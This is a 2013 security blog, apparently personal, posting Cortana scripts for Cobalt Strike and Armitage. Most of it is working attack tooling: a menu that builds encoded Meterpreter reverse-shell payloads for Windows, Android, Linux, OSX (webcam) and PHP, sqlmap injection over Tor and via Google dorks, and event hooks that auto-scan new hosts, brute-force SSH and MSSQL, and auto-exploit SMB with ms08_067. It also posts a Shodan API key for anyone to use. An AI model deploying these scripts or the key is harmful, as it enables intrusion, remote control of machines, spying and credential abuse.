Tuesday, December 10, 2013

Cobalt Strike Report Hosts *Mod*

Posted by at Tuesday, December 10, 2013

armitage-logo

Cobalt Strike has a nice Funktion called Report Hosts.

All “HOST/PORTS/OS/HASHS/EXPLOITS” informations exported into a single pdf file.

reportingtwoways

Now i want to change the Logo on the Top “you cant see it in the Sample Pic sry”

Original PDF Banner

Cobalt Strike logo

My New PDF Banner

logo2

Cobal Strike is coded in Java we can simple extract the *jar file with 7zip or other tools.

27.09.2012  14:26    <DIR>          armitage
27.09.2012 14:26 <DIR> cloudstrike
23.07.2010 09:00 <DIR> com
27.09.2012 14:26 <DIR> console
27.09.2012 14:26 <DIR> cortana
23.12.2011 17:48 <DIR> de
27.09.2012 14:26 <DIR> dns
27.09.2012 14:26 <DIR> endpoint
27.09.2012 14:26 <DIR> graph
27.09.2012 14:26 <DIR> images
19.11.2006 23:41 <DIR> javax
06.08.2005 17:14 <DIR> java_cup
04.09.2012 19:10 28.830 libtapmanager.so
04.09.2012 19:10 34.685 libtapmanager64.so
27.09.2012 14:26 <DIR> license
16.05.2004 02:02 10.317 LICENSE.txt
13.12.2010 18:49 574 log4j.properties
23.07.2012 09:11 <DIR> mail
27.09.2012 14:26 <DIR> META-INF
27.09.2012 14:26 <DIR> msf
14.11.2011 14:21 <DIR> nl
16.05.2004 02:02 622 NOTICE.TXT
02.07.2010 14:04 <DIR> org
27.09.2012 14:26 <DIR> profiler
27.09.2012 14:26 <DIR> report
27.09.2012 14:26 <DIR> resources
27.09.2012 14:26 <DIR> scripts
27.09.2012 14:26 <DIR> scripts-cortana
24.05.2009 00:19 <DIR> sleep
27.09.2012 14:26 <DIR> ssl
27.09.2012 14:26 <DIR> table
27.09.2012 14:26 <DIR> tap
27.09.2012 14:26 <DIR> template
27.09.2012 14:26 <DIR> templates
27.09.2012 14:26 <DIR> tree
27.09.2012 14:26 <DIR> ui

After cobalt strike extract we can see the folder /images/ now we can change the logo and simple repack it into a .jar file.


Now We can start Cobalt Strike again with your new logo.


Before:


Activity Report by gotr00t


After :


Hosts Report by gotr00t


 


Have pfun if anybody need it ;)

Three Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Tuesday, December 10, 2013

Beacon A new advance payload for Cobalt Strike_thumb[2]

 

Auto Payload Menu meets Cobalt Strike Script Engine

Bored again scripting a short Payload menu for Cobalt/Armitage

Some Screenshots :

Kali-2013-12-09-19-39-36Kali-2013-12-09-19-40-14Kali-2013-12-09-19-40-01Kali-2013-12-09-19-40-35Kali-2013-12-09-19-39-51Kali-2013-12-09-19-40-28Kali-2013-12-09-19-42-06Kali-2013-12-09-19-42-16Kali-2013-12-10-01-35-29Kali-2013-12-09-19-45-05Kali-2013-12-10-01-36-02Kali-2013-12-10-01-36-12   Kali-2013-12-09-19-45-43         

Source Code :

# Multi Payload Menu Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Payloads", "payloads",2);

popup payloads {
menu "Windows Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x86 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x86 Reverse Tcp Payload");
cmd($console, "msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x86 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Meta x64" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x64 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x64 Reverse Tcp Payload");
cmd($console, "msfpayload windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X | msfencode -c 10 -e x86/shikata_ga_nai > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/x64/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x64 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x64/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Android Payloads" {
item "Reverse Meta Java" {
$ip = prompt_text("Enter Host for Android Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Android Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Android Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Android Reverse Tcp Payload");
cmd($console, "msfpayload android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD android/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Android Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD android/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Linux Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Linux Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Linux Reverse Tcp Payload");
cmd($console, "msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x86/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Linux Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x86/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Shell x64" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Shell Linux x64 Reverse Shell Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Shell Linux Reverse Shell Payload");
cmd($console, "msfpayload linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x64/shell_reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Shell\c4 Linux x64 Reverse Shell Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x64/shell_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "OSX Payloads" {
item "Reverse iSight" {
$ip = prompt_text("Enter Host for OSX Reverse Tcp Payload");
$port = prompt_text("Enter Port for OSX Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 OSX iSight Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("OSX iSight Reverse Tcp Payload");
cmd($console, "msfpayload osx/x86/isight/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD osx/x86/isight/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4OSX iSight \c4Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD osx/x86/isight/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "PHP Payloads" {
item "Reverse Meta PHP" {
$ip = prompt_text("Enter Host for PHP Reverse Tcp Payload");
$port = prompt_text("Enter Port for PHP Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter PHP Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter PHP Reverse Tcp Payload");
cmd($console, "msfpayload php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R | msfencode -c 1 -e php/base64 -t raw -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD php/meterpreter_reverse_tcp");
cmd($console, "set AutoSystemInfo 1");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 PHP Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD php/meterpreter_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
}

Saturday, December 7, 2013

Two Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Saturday, December 07, 2013

Cobalt Strike logo

 

Shodanhq meets Cobalt Strike Script Engine

Maybe anybody can need it,Just a Simple Interface Script for Shodan Search Engine.

Here some Screenshots :

Kali-2013-11-27-22-02-08_thumb%25255B2%25255D[1]

Enter Search Word Like “ssh2”

Kali-2013-11-27-22-03-13_thumb%25255B2%25255D[1]

Kali-2013-11-27-22-04-38_thumb%25255B4%25255D[1]

Be Happy ;)

Kali-2013-11-27-22-05-55_thumb%25255B4%25255D[1]

Simple Script to parse all ips,sry im not a dev pro ;) No auto add ips atm….. maybe sometimes

Kali-2013-11-27-22-06-37_thumb%25255B3%25255D[1]

Add Host Copy & Paste

Kali-2013-11-27-22-20-49_thumb%25255B4%25255D[1]

Happy Hunting ---->

Its a littlebit buggi but it works .

Source code :

# Shodan API Query for Cobalt Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Shodan API Query for Cobalt Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Shodan Search" {
item "Query Shodan Api" {

$ip = prompt_text("Enter Search Query");
$output = prompt_text("Enter File Name Log File Saved on Desktop");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");

println("\n----------------------------------------\n\c4[*] Get Targets from Shodan API \n----------------------------------------");
$console = console();
$console = open_console_tab("Get Targets from Shodan API");
cmd($console, "use auxiliary/gather/shodan_search");
cmd($console, "set MAXPAGE 5");
cmd($console, "set SHODAN_APIKEY W6UgwFqFuejJvAEOZuRX5Jd6vXrbfN72");
cmd($console, "set QUERY $ip");
cmd($console, "set DATABASE 1");
cmd($console, "set OUTFILE /root/Desktop/$output");
cmd($console, "set VHOST www.shodanhq.com");
cmd($console, "run -j");
sleep(10 * 1000);
}
cmd($console, "python /root/Desktop/shoda.py /root/Desktop/$output");
db_sync();
}
}
}

 


Split Ips from Log File :

 


#!/usr/bin/python
#########################################################################
# ___ _ _ _____ ___ ____ __
# / __)( )_( )( _ )/ __)( _ \( )
# \__ \ ) _ ( )(_)( ( (_-.) / )(__
# (___/(_) (_)(_____)\___/(_)\_)(____) V0.21
# -some code borrowed from >> https://developers.shodan.io/index.html
# -rest created/mixed up by FIZZLESTICK
# -trollsohard[at]rebelbas.es
#
# MORE INFO COMING
#
# [changelog]
# 9/25/2013 v0.2 - written up for RC worth.. needs some IP/vs DNS handling
# 10/11/2013 v0.21 - cleaned up host output a bit, banners, formatting
#########################################################################
#!/usr/bin/env python

#import the necessary modules
import re #for regular expressions - to match ip's
import sys #for parsing command line opts

# I need to probably make this more pythonic but am working on that...
# if file is specified on command line, parse, else ask for file
if sys.argv[1:]:
logfile = sys.argv[1]
else:
logfile = raw_input("Please enter a file to parse, e.g /var/log/secure: ")

try:
# open the file
file = open(logfile, "r")
# create an empty list
ips = []
# read through the file
for text in file.readlines():
#strip off the \n
text = text.rstrip()
#this is probably not the best way, but it works for now
regex = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', text)
# if the regex is not empty and is not already in ips list append
if regex is not None and regex not in ips:
ips.append(regex)


#loop through the list
for ip in ips:
#I know there is argument as to whether the string join method is pythonic
addy = "".join(ip)
if addy is not '':
print "%s"% (addy)
#cleanup and close file
file.close()
#catch any standard error (we can add more later)
except IOError, (errno, strerror):
print "I/O Error(%s) : %s" % (errno, strerror)

INFO : Feel Free to use my Api Key :)


Friday, December 6, 2013

One Day with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Friday, December 06, 2013

Beacon A new advance payload for Cobalt Strike

Today i work a little bit with Cobalt Strike 21 Days Demo.

Really Great Pentest tool like Armitage http://www.advancedpentest.com/ 

After some time i found the Script menu into Cobalt Stike,letz google it what we can do with the Script Engine.

After a while a found a great pdf doko about the Contana Script Engine. Download the pdf here cortana_tutorial.pdf

Now letz play with it.

 

Contana Script Engine Lesson 1
Custom Armitage Menu via Cortana scripts
# Contana-Info Sites Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Info Sites" {
item "Security is just an Illusion" {
url_open("http://security-is-just-an-illusion.blogspot.de/"
);
}
item "TheHackerNews" {
url_open("http://thehackernews.com/");
}
item "Securitytube" {
url_open("http://www.securitytube.net");
}
item "Shodanhq" {
url_open("http://www.shodanhq.com/");
}
item "Exploit-db" {
url_open("http://www.exploit-db.com/");
}
item "1337day" {
url_open("http://1337day.com/");
}
item "Privatepaste" {
url_open("http://privatepaste.com/");
}
item "Hash-cracker.com" {
url_open("http://www.hash-cracker.com/");
}
item "Rainbowtables.it64.com" {
url_open("http://rainbowtables.it64.com/");
}
item "X-attack.net" {
url_open("https://www.x-attack.net/?rtcrack");
}
}
}

Kali-2013-11-26-18-36-52


Contana Script Engine Lesson 2

Custom Armitage Tor Network Menu via Cortana scripts

# Contana-Tor Network Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de


menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Tor Engine" {
item "Start Tor" {
println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Start Tor NetWork");
cmd($console, "tor");
#sleep(30 * 1000);
db_sync()
}
item "Kill Tor" {
println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Kill Tor NetWork");
cmd($console, "killall tor");
#sleep(30 * 1000);
db_sync()
}
item "Restart Tor" {
println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");
$console = console();
$console = open_console_tab("Restart Tor NetWork");
cmd($console, "killall tor && tor");
#sleep(30 * 1000);
db_sync()
}
}
}

Kali-2013-11-26-18-35-57


Contana Script Engine Lesson 2

Custom Armitage Sqlmap Interface Menu via Cortana scripts

# Contana-Sqlmap Interface Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de
# Change Gnome Profile to avoid terminal close after exploit

println("\n----------------------------------------\n\c4[*] Contana-Sqlmap Engine v0.1 Loaded [*] \n----------------------------------------");

menubar("Web ToolKit", "webstuff",2);

popup webstuff {
menu "Sqlmap" {
item "Attack" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -u $ip ;bash");
db_sync()
}
}
item "Attack over Tor" {

$ip = prompt_text("Target + option --dbs ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -u $ip ;bash");
db_sync()
}
}
item "Attack with GDork" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with google Dorks\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent -g $ip ;bash");
db_sync()
}
}
item "Attack with GDork over Tor" {

$ip = prompt_text("Target + option --dbs inurl:gallery.php?id= ?");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Attack\c4 with Sqlmap with Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");
$console = console();
cmd($console, "gnome-terminal -x sqlmap --random-agent --tor --tor-type=socks4 --tor-port=9050 -g $ip ;bash");
db_sync()
}
}
item "GDorks List" {
url_open("http://pastebin.com/raw.php?i=QFhBYbPw");
}
}
}


Kali-2013-11-26-18-37-01


Kali-2013-11-26-18-44-16


Kali-2013-11-26-19-16-37


Contana Script Engine Lesson 3

Custom Armitage on Host add Auto TCP Port Quick Scan via Cortana scripts

# Contana-Quick-Scan Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyy
# from http://security-is-just-an-illusion.blogspot.de

println("\n----------------------------------------\n\c4[*] Contana-Quick-Scan Engine v0.1 Loaded [*] \n----------------------------------------");

# Preform auto scan
on host_add {
sleep(10 * 1000);
println("\n----------------------------------------\n\c4[*] Scanning New Host \nIP : \c9$1\c9\n----------------------------------------");
$console = console();
#$console = open_console_tab("Scanning New Host");
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 23, 25, 80, 110, 143, 443, 445, 1433, 3306, 4899, 5800, 5801, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}

on service_add_21 {
println("\n----------------------------------------\n\c4[*] FTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 21 Open\n----------------------------------------");
}

on service_add_22 {
println("\n----------------------------------------\n\c4[*] SSH-SERVER FOUND \nIP : \c9$1\c9\nPort : 22 Open\n----------------------------------------");
}

on service_add_23 {
println("\n----------------------------------------\n\c4[*] TELNET-SERVER FOUND \nIP : \c9$1\c9\nPort : 23 Open\n----------------------------------------");
}

on service_add_25 {
println("\n----------------------------------------\n\c4[*] SMTP-SERVER FOUND \nIP : \c9$1\c9\nPort : 25 Open\n----------------------------------------");
}

on service_add_80 {
println("\n----------------------------------------\n\c4[*] WEB-SERVER FOUND \nIP : \c9$1\c9\nPort : 80 Open\n----------------------------------------");
}

on service_add_110 {
println("\n----------------------------------------\n\c4[*] POP3-SERVER FOUND \nIP : \c9$1\c9\nPort : 110 Open\n----------------------------------------");
}

on service_add_143 {
println("\n----------------------------------------\n\c4[*] IMAP-SERVER FOUND \nIP : \c9$1\c9\nPort : 143 Open\n----------------------------------------");
}

on service_add_443 {
println("\n----------------------------------------\n\c4[*] HTTPS-SERVER FOUND \nIP : \c9$1\c9\nPort : 443 Open\n----------------------------------------");
}

on service_add_445 {
println("\n----------------------------------------\n\c4[*] MICROSOFT-DS-SERVER FOUND \nIP : \c9$1\c9\nPort : 445 Open\n----------------------------------------");
}

on service_add_1433 {
println("\n----------------------------------------\n\c4[*] MS-SQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 1433 Open\n----------------------------------------");
}

on service_add_3306 {
println("\n----------------------------------------\n\c4[*] MYSQL-SERVER FOUND \nIP : \c9$1\c9\nPort : 3306 Open\n----------------------------------------");
}

on service_add_4899 {
println("\n----------------------------------------\n\c4[*] RADMIN-SERVER FOUND \nIP : \c9$1\c9\nPort : 4899 Open\n----------------------------------------");
}

on service_add_5800 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5800 Open\n----------------------------------------");
}

on service_add_5801 {
println("\n----------------------------------------\n\c4[*] VNC-SERVER FOUND \nIP : \c9$1\c9\nPort : 5801 Open\n----------------------------------------");
}

on service_add_8080 {
println("\n----------------------------------------\n\c4[*] Shared-Service-SERVER FOUND \nIP : \c9$1\c9\nPort : 8080 Open\n----------------------------------------");
}
# EOF

Kali-2013-11-26-19-24-11


Contana Script Engine Lesson 4

Custom Armitage on Host add  &&  port 22  found Auto Bruteforce via Cortana scripts

# Brute New Host with SSH Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

# Preform auto msf port scan
# by monstream00

on host_add {
sleep(10 * 1000);
println("[*] msfScanning New Host TCP/UDP on $1");
$console = console();
#$console = open_console_tab("TCP/UDPscan_$1"); #Debug use
cmd($console, "use auxiliary/scanner/portscan/tcp");
cmd($console, "set THREADS 100");
cmd($console, "set PORTS 21, 22, 80, 110, 143, 443, 445, 1433, 3306, 8080");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
cmd($console, "set THREADS 100");
cmd($console, "set BATCHSIZE 256");
cmd($console, "set RHOSTS $1");
cmd($console, "run -j");
#sleep(30 * 1000);
db_sync();
}


on service_add_22 {
println("\n----------------------------------------\n\c4Attempting to bruteforce\c4 SSH-Server\nIP: \c9$1\c9 \n----------------------------------------");
auxiliary("scanner/ssh/ssh_login", @($1), %(
THREADS => '100',
STOP_ON_SUCCESS => '1',
USER_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_users.txt',
PASS_FILE => '/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt'));
}

Kali-2013-11-26-18-41-03


Brute New Host with MSSQL Server Ready on it

# Brute New Host with MSSQL Server Ready on it.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_1433 {
println("Attempting to brute force MSSQL-Server |$1|");
auxiliary("scanner/mssql/mssql_login", @($1), %(
USER_FILE => '/opt/framework3/msf3/data/wordlists/unix_users.txt',
PASS_FILE => '/opt/framework3/msf3/data/wordlists/unix_passwords.txt'));
}

Contana Script Engine Lesson 4

Custom Armitage on Host add Auto Exploit via Cortana scripts

# Exploit New Host with microsoft-ds samba with the ms08_067_netapi exploit.
# by http://security-is-just-an-illusion.blogspot.de/

on service_add_445 {
println("[*]Exploiting $1 with ms08_067_netapi sploit (" . host_os($1) . ")");
if (host_os($1) eq "Microsoft Windows") {
exploit("windows/smb/ms08_067_netapi", $1);
}
else {
exploit("multi/samba/usermap_script", $1, $null, $null, 1);
}
}

Now Have pfun with Contana Script Engine ;)

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template